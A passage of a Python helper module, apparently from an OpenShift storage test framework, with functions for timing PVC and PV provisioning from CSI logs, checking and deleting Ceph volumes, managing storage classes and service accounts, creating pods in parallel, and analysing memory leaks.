return datetime.datetime.strptime(start, DATE_TIME_FORMAT)
def get_end_creation_time(interface, pvc_name):
"""
Get the ending creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
datetime object: End time of PVC creation
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
    # Extract the ending time for the PVC provisioning
end = [i for i in logs if re.search(f"provision.*{pvc_name}.*succeeded", i)]
# End provisioning string may appear in logs several times, take here the latest one
mon_day = " ".join(end[-1].split(" ")[0:2])
end = f"{this_year} {mon_day}"
return datetime.datetime.strptime(end, DATE_TIME_FORMAT)
def measure_pvc_creation_time(interface, pvc_name):
"""
Measure PVC creation time based on logs
Args:
        interface (str): The interface backed the PVC
        pvc_name (str): Name of the PVC for creation time measurement
Returns:
float: Creation time for the PVC
"""
start = get_start_creation_time(interface=interface, pvc_name=pvc_name)
end = get_end_creation_time(interface=interface, pvc_name=pvc_name)
total = end - start
return total.total_seconds()
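# Illustrative sketch (editor's addition): single-PVC creation time measurement;
# `pvc_obj` is a placeholder for an already Bound PVC object.
#
#   create_seconds = measure_pvc_creation_time(
#       interface=constants.CEPHFILESYSTEM, pvc_name=pvc_obj.name
#   )
#   logger.info(f"PVC {pvc_obj.name} was provisioned in {create_seconds} seconds")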
def measure_pvc_creation_time_bulk(interface, pvc_name_list, wait_time=60):
"""
Measure PVC creation time of bulk PVC based on logs.
Args:
interface (str): The interface backed the PVC
pvc_name_list (list): List of PVC Names for measuring creation time
wait_time (int): Seconds to wait before collecting CSI log
Returns:
pvc_dict (dict): Dictionary of pvc_name with creation time.
"""
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
    # Wait due to some delay in CSI log generation
time.sleep(wait_time)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter = 0
while True:
no_data_list = list()
for name in pvc_name_list:
# check if PV data present in CSI logs
start = [i for i in logs if re.search(f"provision.*{name}.*started", i)]
end = [i for i in logs if re.search(f"provision.*{name}.*succeeded", i)]
if not start or not end:
no_data_list.append(name)
if no_data_list:
            # Clear and re-fetch the CSI logs after wait_time seconds
logging.info(f"PVC count without CSI create log data {len(no_data_list)}")
logs.clear()
time.sleep(wait_time)
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter += 1
if loop_counter >= 6:
logging.info("Waited for more than 6mins still no data")
raise UnexpectedBehaviour(
f"There is no pvc creation data in CSI logs for {no_data_list}"
)
continue
else:
break
pvc_dict = dict()
this_year = str(datetime.datetime.now().year)
for pvc_name in pvc_name_list:
# Extract the starting time for the PVC provisioning
start = [i for i in logs if re.search(f"provision.*{pvc_name}.*started", i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start = f"{this_year} {mon_day}"
start_time = datetime.datetime.strptime(start, DATE_TIME_FORMAT)
# Extract the end time for the PVC provisioning
end = [i for i in logs if re.search(f"provision.*{pvc_name}.*succeeded", i)]
mon_day = " ".join(end[0].split(" ")[0:2])
end = f"{this_year} {mon_day}"
end_time = datetime.datetime.strptime(end, DATE_TIME_FORMAT)
total = end_time - start_time
pvc_dict[pvc_name] = total.total_seconds()
return pvc_dict
def measure_pv_deletion_time_bulk(
interface, pv_name_list, wait_time=60, return_log_times=False
):
"""
Measure PV deletion time of bulk PV, based on logs.
Args:
interface (str): The interface backed the PV
pv_name_list (list): List of PV Names for measuring deletion time
wait_time (int): Seconds to wait before collecting CSI log
        return_log_times (bool): Determines the return value -- if False, a dictionary of pv_names with the
            deletion time is returned; if True, a dictionary of pv_names with the tuple of
            (start_deletion_time, end_deletion_time) is returned
Returns:
pv_dict (dict): Dictionary where the pv_names are the keys. The value of the dictionary depend on the
return_log_times argument value and are either the corresponding deletion times (when return_log_times
is False) or a tuple of (start_deletion_time, end_deletion_time) as they appear in the logs
"""
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
    # Wait due to some delay in CSI log generation
time.sleep(wait_time)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter = 0
while True:
no_data_list = list()
for pv in pv_name_list:
# check if PV data present in CSI logs
start = [i for i in logs if re.search(f'delete "{pv}": started', i)]
end = [i for i in logs if re.search(f'delete "{pv}": succeeded', i)]
if not start or not end:
no_data_list.append(pv)
if no_data_list:
            # Clear and re-fetch the CSI logs after wait_time seconds
logging.info(f"PV count without CSI delete log data {len(no_data_list)}")
logs.clear()
time.sleep(wait_time)
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter += 1
if loop_counter >= 6:
logging.info("Waited for more than 6mins still no data")
raise UnexpectedBehaviour(
f"There is no pv deletion data in CSI logs for {no_data_list}"
)
continue
else:
break
pv_dict = dict()
this_year = str(datetime.datetime.now().year)
for pv_name in pv_name_list:
# Extract the deletion start time for the PV
start = [i for i in logs if re.search(f'delete "{pv_name}": started', i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start_tm = f"{this_year} {mon_day}"
start_time = datetime.datetime.strptime(start_tm, DATE_TIME_FORMAT)
# Extract the deletion end time for the PV
end = [i for i in logs if re.search(f'delete "{pv_name}": succeeded', i)]
mon_day = " ".join(end[0].split(" ")[0:2])
end_tm = f"{this_year} {mon_day}"
end_time = datetime.datetime.strptime(end_tm, DATE_TIME_FORMAT)
total = end_time - start_time
if not return_log_times:
pv_dict[pv_name] = total.total_seconds()
else:
pv_dict[pv_name] = (start_tm, end_tm)
return pv_dict
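# Illustrative sketch (editor's addition): bulk PV deletion time measurement.
# `pvc_objs` and the `backed_pv` attribute access are placeholders; the PV names
# are collected before deleting the PVCs.
#
#   pv_names = [p.backed_pv for p in pvc_objs]     # placeholder attribute access
#   delete_objs_parallel(pvc_objs)                 # defined further below
#   deletion_times = measure_pv_deletion_time_bulk(
#       interface=constants.CEPHBLOCKPOOL, pv_name_list=pv_names
#   )
#   # With return_log_times=True the raw (start, end) log timestamps are returned instead.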
def get_start_deletion_time(interface, pv_name):
"""
Get the starting deletion time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
        pv_name (str): Name of the PV for deletion time measurement
Returns:
datetime object: Start time of PVC deletion
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the starting time for the PVC deletion
start = [i for i in logs if re.search(f'delete "{pv_name}": started', i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start = f"{this_year} {mon_day}"
return datetime.datetime.strptime(start, DATE_TIME_FORMAT)
def get_end_deletion_time(interface, pv_name):
"""
Get the ending deletion time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
        pv_name (str): Name of the PV for deletion time measurement
Returns:
datetime object: End time of PVC deletion
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
    # Extract the ending time for the PV deletion
end = [i for i in logs if re.search(f'delete "{pv_name}": succeeded', i)]
mon_day = " ".join(end[0].split(" ")[0:2])
end = f"{this_year} {mon_day}"
return datetime.datetime.strptime(end, DATE_TIME_FORMAT)
def measure_pvc_deletion_time(interface, pv_name):
"""
Measure PVC deletion time based on logs
Args:
interface (str): The interface backed the PVC
        pv_name (str): Name of the PV for deletion time measurement
Returns:
float: Deletion time for the PVC
"""
start = get_start_deletion_time(interface=interface, pv_name=pv_name)
end = get_end_deletion_time(interface=interface, pv_name=pv_name)
total = end - start
return total.total_seconds()
def pod_start_time(pod_obj):
"""
    Function to measure the time taken for a pod's container(s) to get into the
    running state, by measuring the difference between the pod's start time and
    each container's startedAt time (when the container went into the running state)
Args:
pod_obj(obj): pod object to measure start time
Returns:
containers_start_time(dict):
Returns the name and start time of container(s) in a pod
"""
time_format = "%Y-%m-%dT%H:%M:%SZ"
containers_start_time = {}
start_time = pod_obj.data["status"]["startTime"]
start_time = datetime.datetime.strptime(start_time, time_format)
for container in range(len(pod_obj.data["status"]["containerStatuses"])):
started_time = pod_obj.data["status"]["containerStatuses"][container]["state"][
"running"
]["startedAt"]
started_time = datetime.datetime.strptime(started_time, time_format)
container_name = pod_obj.data["status"]["containerStatuses"][container]["name"]
container_start_time = (started_time - start_time).seconds
containers_start_time[container_name] = container_start_time
return containers_start_time
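# Illustrative sketch (editor's addition): reporting per-container start times for
# a running pod object `pod_obj` (placeholder).
#
#   for container, seconds in pod_start_time(pod_obj).items():
#       logger.info(f"Container {container} took {seconds} seconds to start")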
def get_default_storage_class():
"""
Get the default StorageClass(es)
Returns:
list: default StorageClass(es) list
"""
default_sc_obj = ocp.OCP(kind="StorageClass")
storage_classes = default_sc_obj.get().get("items")
storage_classes = [
sc for sc in storage_classes if "annotations" in sc.get("metadata")
]
return [
sc.get("metadata").get("name")
for sc in storage_classes
if sc.get("metadata")
.get("annotations")
.get("storageclass.kubernetes.io/is-default-class")
== "true"
]
def change_default_storageclass(scname):
"""
Change the default StorageClass to the given SC name
Args:
scname (str): StorageClass name
Returns:
bool: True on success
"""
default_sc = get_default_storage_class()
ocp_obj = ocp.OCP(kind="StorageClass")
if default_sc:
# Change the existing default Storageclass annotation to false
patch = (
' \'{"metadata": {"annotations":'
'{"storageclass.kubernetes.io/is-default-class"'
':"false"}}}\' '
)
patch_cmd = f"patch storageclass {default_sc} -p" + patch
ocp_obj.exec_oc_cmd(command=patch_cmd)
# Change the new storageclass to default
patch = (
' \'{"metadata": {"annotations":'
'{"storageclass.kubernetes.io/is-default-class"'
':"true"}}}\' '
)
patch_cmd = f"patch storageclass {scname} -p" + patch
ocp_obj.exec_oc_cmd(command=patch_cmd)
return True
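# Illustrative sketch (editor's addition): switching the cluster default storage
# class to the RBD thick class and verifying the change, using the same constant
# referenced by default_thick_storage_class() above.
#
#   change_default_storageclass(constants.DEFAULT_STORAGECLASS_RBD_THICK)
#   assert constants.DEFAULT_STORAGECLASS_RBD_THICK in get_default_storage_class()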
def is_volume_present_in_backend(interface, image_uuid, pool_name=None):
"""
Check whether Image/Subvolume is present in the backend.
Args:
interface (str): The interface backed the PVC
image_uuid (str): Part of VolID which represents corresponding
image/subvolume in backend, eg:
``oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'``
Output is the CSI generated VolID and looks like:
``0001-000c-rook-cluster-0000000000000001-f301898c-a192-11e9-852a-1eeeb6975c91``
where image_uuid is ``f301898c-a192-11e9-852a-1eeeb6975c91``
pool_name (str): Name of the rbd-pool if interface is CephBlockPool
Returns:
bool: True if volume is present and False if volume is not present
"""
cmd = ""
valid_error = []
ct_pod = pod.get_ceph_tools_pod()
if interface == constants.CEPHBLOCKPOOL:
valid_error = [f"error opening image csi-vol-{image_uuid}"]
cmd = f"rbd info -p {pool_name} csi-vol-{image_uuid}"
if interface == constants.CEPHFILESYSTEM:
valid_error = [
f"Subvolume 'csi-vol-{image_uuid}' not found",
f"subvolume 'csi-vol-{image_uuid}' does not exist",
]
cmd = (
f"ceph fs subvolume getpath {get_cephfs_name()}"
f" csi-vol-{image_uuid} csi"
)
try:
ct_pod.exec_ceph_cmd(ceph_cmd=cmd, format="json")
logger.info(
f"Verified: Volume corresponding to uuid {image_uuid} exists " f"in backend"
)
return True
except CommandFailed as ecf:
assert any([error in str(ecf) for error in valid_error]), (
f"Error occurred while verifying volume is present in backend: "
f"{str(ecf)} ImageUUID: {image_uuid}. Interface type: {interface}"
)
logger.info(
f"Volume corresponding to uuid {image_uuid} does not exist " f"in backend"
)
return False
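# Illustrative sketch (editor's addition): checking an RBD image in the backend.
# The image_uuid is the trailing UUID of the PV's CSI volumeHandle (see the
# docstring above); the value shown here is a placeholder.
#
#   present = is_volume_present_in_backend(
#       interface=constants.CEPHBLOCKPOOL,
#       image_uuid="f301898c-a192-11e9-852a-1eeeb6975c91",
#       pool_name=default_ceph_block_pool(),
#   )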
def verify_volume_deleted_in_backend(
interface, image_uuid, pool_name=None, timeout=180
):
"""
Ensure that Image/Subvolume is deleted in the backend.
Args:
interface (str): The interface backed the PVC
image_uuid (str): Part of VolID which represents corresponding
image/subvolume in backend, eg:
``oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'``
Output is the CSI generated VolID and looks like:
``0001-000c-rook-cluster-0000000000000001-f301898c-a192-11e9-852a-1eeeb6975c91``
where image_uuid is ``f301898c-a192-11e9-852a-1eeeb6975c91``
pool_name (str): Name of the rbd-pool if interface is CephBlockPool
timeout (int): Wait time for the volume to be deleted.
Returns:
bool: True if volume is deleted before timeout.
False if volume is not deleted.
"""
try:
for ret in TimeoutSampler(
timeout,
2,
is_volume_present_in_backend,
interface=interface,
image_uuid=image_uuid,
pool_name=pool_name,
):
if not ret:
break
logger.info(
f"Verified: Volume corresponding to uuid {image_uuid} is deleted "
f"in backend"
)
return True
except TimeoutExpiredError:
logger.error(
f"Volume corresponding to uuid {image_uuid} is not deleted " f"in backend"
)
# Log 'ceph progress' and 'ceph rbd task list' for debugging purpose
ct_pod = pod.get_ceph_tools_pod()
ct_pod.exec_ceph_cmd("ceph progress json", format=None)
ct_pod.exec_ceph_cmd("ceph rbd task list")
return False
def delete_volume_in_backend(img_uuid, pool_name=None):
"""
Delete an Image/Subvolume in the backend
Args:
img_uuid (str): Part of VolID which represents corresponding
image/subvolume in backend, eg:
``oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'``
Output is the CSI generated VolID and looks like:
``0001-000c-rook-cluster-0000000000000001-f301898c-a192-11e9-852a-1eeeb6975c91``
where image_uuid is ``f301898c-a192-11e9-852a-1eeeb6975c91``
        pool_name (str): The name of the pool
Returns:
bool: True if image deleted successfully
False if:
Pool not found
image not found
image not deleted
"""
cmd = ""
valid_error = []
pool_cr = get_pool_cr(pool_name)
if pool_cr is not None:
if pool_cr["kind"] == "CephFilesystem":
interface = "CephFileSystem"
else:
interface = pool_cr["kind"]
logger.info(f"pool {pool_cr} kind is {interface}")
else:
logger.info(
f"Pool {pool_name} has no kind of "
f"{constants.CEPHBLOCKPOOL} "
f"or {constants.CEPHFILESYSTEM}"
)
return False
# Checking if image is present before trying to delete
image_present_results = is_volume_present_in_backend(
interface=interface, image_uuid=img_uuid, pool_name=pool_name
)
    # In case the image is present, delete it
if image_present_results:
if interface == constants.CEPHBLOCKPOOL:
logger.info(
f"Trying to delete image csi-vol-{img_uuid} from pool {pool_name}"
)
valid_error = ["No such file or directory"]
cmd = f"rbd rm -p {pool_name} csi-vol-{img_uuid}"
if interface == constants.CEPHFILESYSTEM:
logger.info(
f"Trying to delete image csi-vol-{img_uuid} from pool {pool_name}"
)
valid_error = [
f"Subvolume 'csi-vol-{img_uuid}' not found",
f"subvolume 'csi-vol-{img_uuid}' does not exist",
]
cmd = f"ceph fs subvolume rm {get_cephfs_name()} csi-vol-{img_uuid} csi"
ct_pod = pod.get_ceph_tools_pod()
try:
ct_pod.exec_ceph_cmd(ceph_cmd=cmd, format=None)
except CommandFailed as ecf:
if any([error in str(ecf) for error in valid_error]):
                logger.info(
                    f"Error occurred while deleting the volume from the backend: "
                    f"{str(ecf)} ImageUUID: {img_uuid}. Interface type: {interface}"
                )
return False
verify_img_delete_result = is_volume_present_in_backend(
interface=interface, image_uuid=img_uuid, pool_name=pool_name
)
if not verify_img_delete_result:
logger.info(f"Image csi-vol-{img_uuid} deleted successfully")
return True
else:
logger.info(f"Image csi-vol-{img_uuid} not deleted successfully")
return False
return False
def create_serviceaccount(namespace):
"""
Create a Serviceaccount
Args:
namespace (str): The namespace for the serviceaccount creation
Returns:
OCS: An OCS instance for the service_account
"""
service_account_data = templating.load_yaml(constants.SERVICE_ACCOUNT_YAML)
service_account_data["metadata"]["name"] = create_unique_resource_name(
"sa", "serviceaccount"
)
service_account_data["metadata"]["namespace"] = namespace
return create_resource(**service_account_data)
def get_serviceaccount_obj(sa_name, namespace):
"""
Get serviceaccount obj
Args:
sa_name (str): Service Account name
namespace (str): The namespace for the serviceaccount creation
Returns:
OCS: An OCS instance for the service_account
"""
ocp_sa_obj = ocp.OCP(kind=constants.SERVICE_ACCOUNT, namespace=namespace)
try:
sa_dict = ocp_sa_obj.get(resource_name=sa_name)
return OCS(**sa_dict)
except CommandFailed:
logger.error("ServiceAccount not found in specified namespace")
def validate_scc_policy(sa_name, namespace, scc_name=constants.PRIVILEGED):
"""
    Validate that the serviceaccount is added to the given SCC (privileged by default)
Args:
sa_name (str): Service Account name
namespace (str): The namespace for the serviceaccount creation
scc_name (str): SCC name
Returns:
        bool: True if sa_name is present in the given SCC, else False
"""
sa_name = f"system:serviceaccount:{namespace}:{sa_name}"
logger.info(sa_name)
ocp_scc_obj = ocp.OCP(kind=constants.SCC, namespace=namespace)
scc_dict = ocp_scc_obj.get(resource_name=scc_name)
scc_users_list = scc_dict.get("users")
for scc_user in scc_users_list:
if scc_user == sa_name:
return True
return False
def add_scc_policy(sa_name, namespace):
"""
Adding ServiceAccount to scc privileged
Args:
sa_name (str): ServiceAccount name
namespace (str): The namespace for the scc_policy creation
"""
ocp = OCP()
out = ocp.exec_oc_cmd(
command=f"adm policy add-scc-to-user privileged system:serviceaccount:{namespace}:{sa_name}",
out_yaml_format=False,
)
logger.info(out)
def remove_scc_policy(sa_name, namespace):
"""
Removing ServiceAccount from scc privileged
Args:
sa_name (str): ServiceAccount name
namespace (str): The namespace for the scc_policy deletion
"""
ocp = OCP()
out = ocp.exec_oc_cmd(
command=f"adm policy remove-scc-from-user privileged system:serviceaccount:{namespace}:{sa_name}",
out_yaml_format=False,
)
logger.info(out)
def craft_s3_command(cmd, mcg_obj=None, api=False):
"""
Crafts the AWS CLI S3 command including the
    login credentials and command to be run
Args:
mcg_obj: An MCG object containing the MCG S3 connection credentials
cmd: The AWSCLI command to run
        api: True if the call is for s3api, False if for s3
Returns:
str: The crafted command, ready to be executed on the pod
"""
api = "api" if api else ""
if mcg_obj:
base_command = (
f'sh -c "AWS_CA_BUNDLE={constants.SERVICE_CA_CRT_AWSCLI_PATH} '
f"AWS_ACCESS_KEY_ID={mcg_obj.access_key_id} "
f"AWS_SECRET_ACCESS_KEY={mcg_obj.access_key} "
f"AWS_DEFAULT_REGION={mcg_obj.region} "
f"aws s3{api} "
f"--endpoint={mcg_obj.s3_internal_endpoint} "
)
string_wrapper = '"'
else:
base_command = f"aws s3{api} --no-sign-request "
string_wrapper = ""
return f"{base_command}{cmd}{string_wrapper}"
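# Illustrative sketch (editor's addition): running a crafted S3 command from an
# awscli pod; `mcg_obj`, `awscli_pod` and the bucket name are placeholders for
# objects normally provided by test fixtures.
#
#   list_cmd = craft_s3_command("ls s3://my-bucket", mcg_obj=mcg_obj)
#   awscli_pod.exec_cmd_on_pod(command=list_cmd)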
def get_current_test_name():
"""
A function to return the current test name in a parsed manner
Returns:
str: The test name.
"""
return os.environ.get("PYTEST_CURRENT_TEST").split(":")[-1].split(" ")[0]
def setup_pod_directories(pod_obj, dir_names):
"""
Creates directories on the specified pod.
    Directories are created under the respective test name directory.
    Args:
        pod_obj: A pod object on which to create directories
        dir_names: A list of directory names to create.
Returns:
list: A list of all the full paths of the created directories
"""
full_dirs_path = []
test_name = get_current_test_name()
pod_obj.exec_cmd_on_pod(command=f"mkdir -p {test_name}")
for cur_dir in dir_names:
current = f"{test_name}/{cur_dir}"
pod_obj.exec_cmd_on_pod(command=f"mkdir -p {current}")
full_dirs_path.append(current)
return full_dirs_path
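# Illustrative sketch (editor's addition): creating per-test working directories on
# a pod and inspecting them; `pod_obj` is a placeholder pod object.
#
#   dirs = setup_pod_directories(pod_obj, ["dir_a", "dir_b"])
#   for d in dirs:
#       pod_obj.exec_cmd_on_pod(command=f"ls -ld {d}")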
def wait_for_resource_count_change(
func_to_use,
previous_num,
namespace,
change_type="increase",
min_difference=1,
timeout=20,
interval=2,
**func_kwargs,
):
"""
Wait for a change in total count of PVC or pod
Args:
func_to_use (function): Function to be used to fetch resource info
Supported functions: pod.get_all_pvcs(), pod.get_all_pods()
previous_num (int): Previous number of pods/PVCs for comparison
namespace (str): Name of the namespace
change_type (str): Type of change to check. Accepted values are
'increase' and 'decrease'. Default is 'increase'.
min_difference (int): Minimum required difference in PVC/pod count
timeout (int): Maximum wait time in seconds
interval (int): Time in seconds to wait between consecutive checks
Returns:
        bool: True if the difference in count is greater than or equal to
            'min_difference'. False in case of timeout.
"""
try:
for sample in TimeoutSampler(
timeout, interval, func_to_use, namespace, **func_kwargs
):
if func_to_use == pod.get_all_pods:
current_num = len(sample)
else:
current_num = len(sample["items"])
if change_type == "increase":
count_diff = current_num - previous_num
else:
count_diff = previous_num - current_num
if count_diff >= min_difference:
return True
except TimeoutExpiredError:
return False
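# Illustrative sketch (editor's addition): waiting for at least 3 new pods to
# appear in a namespace; `previous_pod_count` is a placeholder snapshot taken earlier.
#
#   assert wait_for_resource_count_change(
#       func_to_use=pod.get_all_pods,
#       previous_num=previous_pod_count,
#       namespace="my-test-namespace",   # placeholder
#       change_type="increase",
#       min_difference=3,
#       timeout=120,
#   )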
def verify_pv_mounted_on_node(node_pv_dict):
"""
Check if mount point of a PV exists on a node
Args:
node_pv_dict (dict): Node to PV list mapping
eg: {'node1': ['pv1', 'pv2', 'pv3'], 'node2': ['pv4', 'pv5']}
Returns:
dict: Node to existing PV list mapping
eg: {'node1': ['pv1', 'pv3'], 'node2': ['pv5']}
"""
existing_pvs = {}
for node_name, pvs in node_pv_dict.items():
cmd = f"oc debug nodes/{node_name} -- df"
df_on_node = run_cmd(cmd)
existing_pvs[node_name] = []
for pv_name in pvs:
if f"/pv/{pv_name}/" in df_on_node:
existing_pvs[node_name].append(pv_name)
return existing_pvs
def converge_lists(list_to_converge):
"""
    Function to flatten a list of lists (e.g. the sublists produced when collecting results from future objects)
Args:
list_to_converge (list): arg list of lists, eg: [[1,2],[3,4]]
Returns:
list (list): return converged list eg: [1,2,3,4]
"""
return [item for sublist in list_to_converge for item in sublist]
def create_multiple_pvc_parallel(sc_obj, namespace, number_of_pvc, size, access_modes):
"""
    Function to create multiple PVCs in parallel using threads
    Function will create PVCs based on the available access modes
    Args:
        sc_obj (obj): Storage Class object
        namespace (str): The namespace for creating the PVCs
        number_of_pvc (int): Number of PVCs to be created
size (str): size of the pvc eg: '10Gi'
access_modes (list): List of access modes for PVC creation
Returns:
pvc_objs_list (list): List of pvc objs created in function
"""
obj_status_list, result_lists = ([] for i in range(2))
with ThreadPoolExecutor() as executor:
for mode in access_modes:
result_lists.append(
executor.submit(
create_multiple_pvcs,
sc_name=sc_obj.name,
namespace=namespace,
number_of_pvc=number_of_pvc,
access_mode=mode,
size=size,
)
)
result_list = [result.result() for result in result_lists]
pvc_objs_list = converge_lists(result_list)
# Check for all the pvcs in Bound state
with ThreadPoolExecutor() as executor:
for objs in pvc_objs_list:
obj_status_list.append(
executor.submit(wait_for_resource_state, objs, "Bound", 90)
)
if False in [obj.result() for obj in obj_status_list]:
raise TimeoutExpiredError
return pvc_objs_list
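# Illustrative sketch (editor's addition): creating RWO and RWX PVCs in parallel
# from a storage class object `sc_obj` (placeholder); the resulting PVCs can then
# be handed to create_pods_parallel() defined below.
#
#   pvc_objs = create_multiple_pvc_parallel(
#       sc_obj, namespace="my-test-namespace", number_of_pvc=10, size="2Gi",
#       access_modes=[constants.ACCESS_MODE_RWO, constants.ACCESS_MODE_RWX],
#   )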
def create_pods_parallel(
pvc_list,
namespace,
interface,
pod_dict_path=None,
sa_name=None,
raw_block_pv=False,
dc_deployment=False,
node_selector=None,
):
"""
Function to create pods in parallel
Args:
pvc_list (list): List of pvcs to be attached in pods
namespace (str): The namespace for creating pod
interface (str): The interface backed the PVC
pod_dict_path (str): pod_dict_path for yaml
sa_name (str): sa_name for providing permission
        raw_block_pv (bool): True if the PVC is raw block, False otherwise
        dc_deployment (bool): True for a DeploymentConfig based deployment, False otherwise
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
Returns:
pod_objs (list): Returns list of pods created
"""
future_pod_objs = []
    # A 300 sec wait time is used because in scale tests, once the setup has more
    # PODs, the time taken for a pod to come up depends on the available resources
wait_time = 300
if raw_block_pv and not pod_dict_path:
pod_dict_path = constants.CSI_RBD_RAW_BLOCK_POD_YAML
with ThreadPoolExecutor() as executor:
for pvc_obj in pvc_list:
future_pod_objs.append(
executor.submit(
create_pod,
interface_type=interface,
pvc_name=pvc_obj.name,
do_reload=False,
namespace=namespace,
raw_block_pv=raw_block_pv,
pod_dict_path=pod_dict_path,
sa_name=sa_name,
dc_deployment=dc_deployment,
node_selector=node_selector,
)
)
pod_objs = [pvc_obj.result() for pvc_obj in future_pod_objs]
# Check that all the pods are in Running state.
# The pod creation above does not wait for the pods because threads are used.
with ThreadPoolExecutor() as executor:
for obj in pod_objs:
future_pod_objs.append(
executor.submit(
wait_for_resource_state, obj, "Running", timeout=wait_time
)
)
# If pods not up raise exception/failure
if False in [obj.result() for obj in future_pod_objs]:
raise TimeoutExpiredError
return pod_objs
def delete_objs_parallel(obj_list):
"""
Function to delete the objects specified in the list
Args:
obj_list (list): List of objects (pod, pvc, etc.) to delete
Returns:
bool: True once all delete threads have completed
"""
threads = list()
for obj in obj_list:
process = threading.Thread(target=obj.delete)
process.start()
threads.append(process)
for process in threads:
process.join()
return True
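# Hedged sketch (not part of the original module): the thread-based loop above
# swallows any exception raised inside obj.delete(), because threading.Thread
# does not propagate exceptions to the caller. An equivalent fan-out with
# concurrent.futures surfaces the first failure when result() is called.
# It assumes only that each object exposes a .delete() method.
def _delete_objs_parallel_sketch(obj_list):
    from concurrent.futures import ThreadPoolExecutor
    with ThreadPoolExecutor() as executor:
        futures = [executor.submit(obj.delete) for obj in obj_list]
        for future in futures:
            # re-raises any exception raised by obj.delete()
            future.result()
    return True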
def memory_leak_analysis(median_dict):
"""
Function to analyse a memory leak after execution of a test case. The memory
leak is analyzed based on the top output "RES" value of the ceph-osd daemon,
i.e. ``list[7]`` in the code.
More detail on the median value: calculating the memory leak requires a constant
reference value, which should not be taken at the start or end of the test, so it
is obtained by sampling memory for 180 sec before TC execution and taking the
median of those samples.
The memory value can differ between nodes, so a constant value is identified for
each node and stored in median_dict.
Args:
median_dict (dict): dict of worker nodes and respective median value
eg: median_dict = {'worker_node_1':102400, 'worker_node_2':204800, ...}
Usage::
test_case(.., memory_leak_function):
.....
median_dict = helpers.get_memory_leak_median_value()
.....
TC execution part, memory_leak_fun will capture data
....
helpers.memory_leak_analysis(median_dict)
....
"""
# dict to store memory leak difference for each worker
diff = {}
for worker in node.get_worker_nodes():
memory_leak_data = []
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
with open(f"/tmp/{worker}-top-output.txt", "r") as f:
data = f.readline()
list = data.split(" ")
list = [i for i in list if i]
memory_leak_data.append(list[7])
else:
logging.info(f"worker {worker} memory leak file not found")
raise UnexpectedBehaviour
number_of_lines = len(memory_leak_data) - 1
# Get the start value from the median_dict arg for the respective worker
start_value = median_dict[f"{worker}"]
end_value = memory_leak_data[number_of_lines]
logging.info(f"Median value {start_value}")
logging.info(f"End value {end_value}")
# Convert the values to kb for calculations
if start_value.__contains__("g"):
start_value = float(1024 ** 2 * float(start_value[:-1]))
elif start_value.__contains__("m"):
start_value = float(1024 * float(start_value[:-1]))
else:
start_value = float(start_value)
if end_value.__contains__("g"):
end_value = float(1024 ** 2 * float(end_value[:-1]))
elif end_value.__contains__("m"):
end_value = float(1024 * float(end_value[:-1]))
else:
end_value = float(end_value)
# Calculate the percentage of diff between start and end value
# Based on value decide TC pass or fail
diff[worker] = ((end_value - start_value) / start_value) * 100
logging.info(f"Percentage diff in start and end value {diff[worker]}")
if diff[worker] <= 20:
logging.info(f"No memory leak in worker {worker} passing the test")
else:
logging.info(f"There is a memory leak in worker {worker}")
logging.info(f"Memory median value start of the test {start_value}")
logging.info(f"Memory value end of the test {end_value}")
raise UnexpectedBehaviour
def get_memory_leak_median_value():
"""
Function to calculate the memory leak median value by collecting data for 180 sec
and finding the median, which will be considered as the starting point
for evaluating the memory leak using the "RES" value of the ceph-osd daemon, i.e. list[7] in the code
Returns:
median_dict (dict): dict of worker nodes and respective median value
"""
median_dict = {}
timeout = 180 # wait for 180 sec to evaluate memory leak median data.
logger.info(f"waiting for {timeout} sec to evaluate the median value")
time.sleep(timeout)
for worker in node.get_worker_nodes():
memory_leak_data = []
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
with open(f"/tmp/{worker}-top-output.txt", "r") as f:
data = f.readline()
list = data.split(" ")
list = [i for i in list if i]
memory_leak_data.append(list[7])
else:
logging.info(f"worker {worker} memory leak file not found")
raise UnexpectedBehaviour
median_dict[f"{worker}"] = statistics.median(memory_leak_data)
return median_dict
def refresh_oc_login_connection(user=None, password=None):
"""
Function to refresh the oc user login.
By default, login uses the kubeadmin user and password.
Args:
